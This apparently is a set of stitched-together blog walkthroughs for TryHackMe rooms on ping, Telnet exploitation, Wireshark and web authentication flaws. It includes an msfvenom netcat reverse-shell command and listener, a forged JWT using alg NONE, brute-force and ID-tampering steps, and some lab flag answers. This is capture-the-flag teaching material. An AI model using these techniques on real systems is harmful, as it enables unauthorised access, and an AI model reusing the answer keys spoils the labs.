Network Tool Ping

At this stage, hopefully all of the theory has made sense and you now understand the basic models behind computer networking. For the rest of the room we're going to be taking a look at some of the command line networking tools that we can use in practical applications. Many of these tools do work on other operating systems, but for the sake of simplicity, I'm going to assume that you're running Linux for the rest of this room. The first tool that we're going to look at will be the ping command. Networking Ping command


The ping command is used when we want to test whether a connection to a remote resource is possible. Usually this will be a website on the internet, but it could also be for a computer on your home network if you want to check if it's configured correctly. Ping works using the ICMP protocol, which is one of the slightly less well-known TCP/IP protocols that I mentioned earlier. The ICMP protocol works on the Network layer of the OSI Model, and thus the Internet layer of the TCP/IP model. The basic syntax for ping is ping <target>.


In this example I am using ping to test whether a network connection to Google is possible:







Notice that the ping command actually returned the IP address for the Google server that it connected to, rather than the URL that I requested. This is a handy secondary application for ping, as it can be used to determine the IP address of the server hosting a website. One of the big advantages of ping is that it's pretty much ubiquitous to any network enabled device. All operating systems support it out of the box, and even most embedded devices can use ping!



Have a go at the following questions. Any questions about syntax can be answered using the man page for ping (man ping on Linux).


#1 What command would you use to ping the bbc.co.uk website?

Ans :- ping bbc.co.uk



#2 Ping muirlandoracle.co.uk
What is the IP address?


Ans :- 217.160.0.152



#3 What switch lets you change the interval of sent ping requests?


Ans :- -i



#4 What switch would allow you to restrict requests to IPV4?

Ans :- -4


#5 What switch would give you a more verbose output?

Ans :- -v






I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

What is Telnet?

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

Let's start out the same way we usually do, a port scan, to find out as much information as we can about the services, applications, structure and operating system of the target machine. Scan the machine with nmap and the tag -A and -p-.


Tag

-A : Enables OS Detection, Version Detection, Script Scanning and Traceroute all in one

-p- : Enables scanning across all ports, not just the top 1000


Output

Let's see what's going on on the target server...


#1 How many ports are open on the target machine?   



#2 What port is this?



#3 This port is unassigned, but still lists the protocol it's using, what protocol is this?    



#4 Now re-run the nmap scan, without the -p- tag, how many ports show up as open?



#5 Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.




#6 Based on the title returned to us, what do we think this port could be used for?



#7 Who could it belong to? Gathering possible usernames is an important step in enumeration.



#8 Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

A CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to a security flaw.


However, you're far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.




Method Breakdown


So, from our enumeration stage, we know:

Using this information, let's try accessing this telnet port, and using that as a foothold to get a full reverse shell on the machine!



Connecting to Telnet

You can connect to a telnet server with the following syntax:

"telnet [ip] [port]"

We're going to need to keep this in mind as we try and exploit this machine.

A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.


The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.




#1 Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.



#2 Great! It's an open telnet connection! What welcome message do we receive?



#3 Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)



#4 Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.



#5 Start a tcpdump listener on your local machine using: "sudo tcpdump ip proto \\icmp -i tun0" This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.



#6 Now, use the command "ping [local tun0 ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)



#7 Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!



#8 We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:
"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

What word does the generated payload start with?



#9 Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

"nc -lvp [listening port]"

What would the command look like for the listening port we selected in our payload?




#10 Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!



#11 Success! What is the contents of flag.txt?


I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

We've gone over the basic theory -- now let's put it into practice! In this task we're going to look at some captured network traffic to see the advantages of understanding the OSI and TCP/IP Models. Wireshark Capture Network  Traffic

Wireshark is a tool used to capture and analyse packets of data going across a network.


We're going to use Wireshark to get an idea of what these models look like in practice, with real world data.


Download the attached .pcap file (Wireshark capture) and follow along!

Click Here :- PCAP FIle 

When you first load the packet into Wireshark you're given a list of captured data in the top window (there are two items in this window just now), and in the bottom two windows you're shown the data contained in each captured packet of data:

Currently we're looking at the first packet, so let's have a look at the data in a little more detail:

- Hacking Truth by Kumar Atul Jaiswal

- Hacking Truth by Kumar Atul Jaiswal

A new room opened up recently on TryHackMe called Authenticate, so I thought I'd give it a shot and write this blog post whilst doing it. TryHackMe Authenticate Room Walkthrough

It looks to be a relatively simple "walkthrough" style room where they give you all the information you need in order to crack it.

I shall try to use different methods than the intended path as a test to show that for a lot of tasks there are many ways you can solve the challenges.

Tool :- Nmap*

nmap -A -Pn -sC -sV --script vuln 10.10.25.136

In today's time, the use of the authentication system is increasing because of the increase in the number of services that are coming up on the internet. But not everyone knows how to either make proper authentication software or how to properly set up one.

The aim of this room is to teach how to find authentication bugs and how you can exploit them.

The very obvious method of attacking any login form is just to brute force the credentials. But in this kind of brute force, we don't simply try numbers or simple alphabets. What we do is take an existing dictionary of commonly used username/passwords and use those to see if we can find the right combination. This is known as Dictionary Attack.

To perform a dictionary attack we can use a lot of tools like Hydra or Medusa but the issue with these CLI tools is that we need to provide a lot of arguments to them started and that could be confusing. That is why when trying a dictionary attack on a web application/form it's better to use Burp Suite. In Burp we can capture the login request and then use intruder to perform the attack.

If you are not familiar with burp suite then I would recommend that you first complete the Learn Burp Suite room.

Now let me show you an example using the Burp Suite:

1) Connect on port 8888

2) Now while the Capture is On in burp suite, enter any values you like in the username and password field.

3) Send this request to the intruder and for the position of the payload, we are just going to guess the password for the user jack. For payload, you can use any know default password list or maybe load a part of rockYou.

Note: Here I know that there exists a user named jack and that is why I am using that. In a real-life scenario, you might have to guess both the username and password.

Our Method

[Task 3] Re-registration

In the previous task, we saw that it is possible to just simply guess/brute force the password with the help of a password dictionary. In this task, we are going to focus on a vulnerability that is unique in its own way.


A lot of times what happens is that developer forgets to sanitize the input(username & password) given by the user in the code of their application which can make them vulnerable to things like SQL injection but SQLi could be a bit difficult to exploit. So we are going to focus on a vulnerability that happens because of a developer's mistake but is very easy to exploit i.e re-registration of an existing user.


Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.


To see this in action go to port 8888  and try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.




#1 What is the flag that you found in darren's account?


Note :- Space with highlated mark 





Ans :- fe86079416a21a3c99937fea8874b667




#2 Now try to do the same trick and see if you can login as arthur.


Ans :- No Answer Needed



#3 What is the flag that you found in arthur's account?



Ans :- please Try it yourself




[Task 4] JSON Web Token


JSON Web Token(JWT) is one of the commonly used methods for authorization. This is a kind of cookie that is generated using HMAC hashing or public/private keys. So unlike any other kind of cookie, it lets the website know what kind of access the currently logged in user has. The only special thing about JWT is that they are in JSON format(after decoding).


JWT can be divided into 3 parts separated by a dot(.)


1) Header:  This consists of the algorithm used and the type of the token.


{  "alg": "HS256", "typ": "JWT"}

alg could be HMAC, RSA, SHA256 or can even contain None value.


2) Payload: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.


3) Signature: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)


Now to put all the 3 part together we base64 encode all of them separated by a dot(.) so it would look something like:



eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c



Note: This example was taken from jwt.io and you should check that website out if you want to learn more about JWT.

Exploitation

If used properly this is a very secure way of authorization but the problem is with using is "properly". A lot of developers misconfigure their system leaving it open to exploitation.


Now one of the methods to exploit this is to perform a brute force/dictionary attack and find the secret used for encrypting the JWT token and then used that to generate new tokens. But here we are not going to do that, we are going to see a very amazing way of exploiting this.




If you remember, in the Header section I said that the alg can be whatever the algorithm is used and also it can be None if no encryption is to be used. Now, this should not be used when the application is in production but again the problem of misconfiguration comes in and make the application vulnerable to this kind of attack. The attack is that an attacker can log in as low privilege user says guest and then get the JWT token for that user and then decode the token and edit the headers to use set alg value to None. This would mean that no encryption has to be used therefore the attacker wouldn't need to the secret used for encryption.

Practical

Let's see this method in practice. For this challenge visit the port 5000.


It is a very simple login page and in that, you can log in via two users: user and user2. Now first let's try to login with the credentials of user:user . To do so first enter those credentials then click on the Authenticate button and then enable the capture in burp suite and then click on the Go button. In the burp tab, you should see a request to /protected and there you'll see the JWT token.











Now take this JWT token and then you can decode it part by part.



So if we decode the first part, which will do: {"typ":"JWT","alg":"HS256"}


and decoding the 2nd part, we will get: {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":1}


If you try to decode the 3rd part then you'll get some gibberish. But that is okay we only need the first and the second part.

Now if we notice the identity value that is probably being used to identify the user but if you'll just edit that then it won't work because as I said the 3rd part is encrypted. So to bypass this we will make changes in the header as well as the value of the identity.

Encode the following string with base64 and that will be our first part


{"typ":"JWT","alg":"NONE"}


For the second part, we'll encode the following string:


{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2}


Notice how we changed the value of identity from 1  to 2.
Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:



eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.





Now open the developer's tools in your browser and edit the stored cookie of the website to this new one and then just press the Go button and you'll notice that it will prompt "Welcome user2: guest2".


In a similar manner, you can try to play and find other users on the website.


This kind of misconfiguration in the authentication system is common and could be exploited to escalate privileges or steal information.

Our Method

#1 Use the same method to find identity of admin user and retrieve the flag?



1) First you open Burp



2) set proxy in your browser










3) Enable Intercept on burp suite and Login with user:user









4) Then, copy this :- eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.








and replace with highlated mark and press forward button on burp suite











Ans :-

[Task 5] No Auth

In this I am going to show you how a lot of systems don't even have proper authentication and their system is just left open for anyone to exploit it.





A lot of time on websites we see that when we register a user and login with our credentials we are given a certain id which either is completely a number or ends with a number. Most of the time developers secures their application but sometime in some places, it could happen that just by changing that number we are able to see some hidden or private data.


To test this go to port 7777. On that just create an account. Once the account is created visit your Private Space.









As you can see in the image above the URL have /users/1. Try to change that value to 2 and we will get access to the admin account









The chance of finding this kind of vulnerability is very low but it could be a very serious bug if you get lucky and found something like this.


 

#1 Find the way to get into superadmin ad
 

Ans :- No Answer Needed



After Register and login Try With 0 :-


http://10.10.11.138:7777/users/0



#2 What is the password for superadmin account?


Ans :- 









#3 What is the flag you found in superadmin account?


Ans :-





Video Tutorial :- 

 

   

 

 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.






I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)